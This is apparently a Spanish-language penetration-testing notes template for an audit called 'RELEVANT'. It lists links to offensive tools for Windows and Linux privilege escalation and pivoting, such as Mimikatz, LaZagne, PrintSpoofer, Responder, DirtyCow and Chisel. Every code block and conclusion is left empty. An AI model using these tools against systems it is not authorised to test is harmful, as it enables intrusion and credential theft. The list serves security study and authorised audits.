METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERUP👈 --------------------------------->https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MIMIKATZ👈 --------------------------------->https://www.kali.org/tools/mimikatz/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROTTENPOTATO👈 --------------------------------->https://github.com/breenmachine/RottenPotatoNG
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWS EXPLOITS SUGGESTER👈 --------------------------------->https://github.com/AonCyberLabs/Windows-Exploit-Suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ACCESSCHK👈 --------------------------------->https://github.com/ankh2054/windows-pentest
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PSEXEC👈 --------------------------------->https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINPEAS👈 --------------------------------->https://www.kali.org/tools/peass-ng/ --->https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BLOODHOUND --------------------------------->https://github.com/BloodHoundAD/BloodHound
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EMPIRE POWERSHELL Y LINUX👈 --------------------------------->https://www.kali.org/tools/powershell-empire/ -->https://github.com/EmpireProject/Empire
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LOLBAS👈 --------------------------------->https://lolbas-project.github.io/#
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WADCOMS comandos👈 --------------------------------->https://wadcoms.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HIJACKLIBS DLL👈 --------------------------------->https://hijacklibs.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRINTSPOOFER👈 --------------------------------->https://github.com/itm4n/PrintSpoofer
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROGUEWINRM👈 --------------------------------->https://github.com/antonioCoco/RogueWinRM
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWSPRIVESC metodos👈 --------------------------------->https://github.com/debiantano/WindowsPrivesc
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERSPLOIT👈 --------------------------------->https://www.kali.org/tools/powersploit/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EVIL-WINRM👈 --------------------------------->https://www.kali.org/tools/evil-winrm/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️

🐧 ESCALADA DE PRIVILEGIOS LINUX ❌

ESCALADA DE PRIVILEGIOS LINUX

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX KERNEL CVEs👈 --------------------------------->https://www.linuxkernelcves.com/cves
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINENUM👈 --------------------------------->https://github.com/rebootuser/LinEnum
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINPEAS👈 --------------------------------->https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ENUMERACION SMART LINUX👈 --------------------------------->https://github.com/diego-treitos/linux-smart-enumeration
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUXPRIVCHECKER👈 --------------------------------->https://github.com/sleventyeleven/linuxprivchecker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX EXPLOIT SUGGESTER👈 --------------------------------->https://github.com/The-Z-Labs/linux-exploit-suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHKROOTKIT👈 --------------------------------->https://github.com/Magentron/chkrootkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LYNIS👈 --------------------------------->https://github.com/CISOfy/lynis
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
UNIX-PRIVESC-CHECK👈 --------------------------------->https://github.com/pentestmonkey/unix-privesc-check
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRDTYCOW👈 --------------------------------->https://github.com/firefart/dirtycow
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️

♻️ PIVOTING ❌

PIVOTING

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PROXYCHAINS👈 --------------------------------->https://github.com/rofl0r/proxychains-ng
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCAT👈 --------------------------------->https://nmap.org/ncat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHISEL👈 --------------------------------->https://github.com/jpillora/chisel--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CORKSCREW👈 --------------------------------->https://github.com/bryanpkc/corkscrew
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://github.com/rapid7/metasploit-framework
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METERPRETER👈 --------------------------------->https://www.metasploit.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
REGEORG👈 --------------------------------->https://github.com/sensepost/reGeorg
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RPIVOT👈 --------------------------------->https://github.com/klsecservices/rpivot
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀

MAPA MENTAL REALIZADO CON P4Informesmentales, mas al final docummentos adjuntos de el:

INTERNAL_P4Informemental.pdf

Last updated 1 year ago

hashtagAUDITORIA DE: ((RELEVANT))

hashtag

hashtagRECONOCIMIENTO PASIVO

hashtagANALISIS FORENSE

hashtag

hashtagRECONOCIMIENTO ACTIVO

hashtagINVESTIGACION OSINT

hashtagHASHES Y DESENCRIPTADOS

hashtagFUERZA BRUTA A LOGINS

hashtagSCRIPT DE EXPLOIT Y PAYLOADS

hashtagEXPLOTACION

hashtagESCALADA DE PRIVILEGIOS WINDOWS

hashtagESCALADA DE PRIVILEGIOS LINUX

hashtagPIVOTING

AUDITORIA DE: ((RELEVANT))

RECONOCIMIENTO PASIVO

ANALISIS FORENSE

RECONOCIMIENTO ACTIVO

INVESTIGACION OSINT

HASHES Y DESENCRIPTADOS

FUERZA BRUTA A LOGINS

SCRIPT DE EXPLOIT Y PAYLOADS

EXPLOTACION

ESCALADA DE PRIVILEGIOS WINDOWS

ESCALADA DE PRIVILEGIOS LINUX

PIVOTING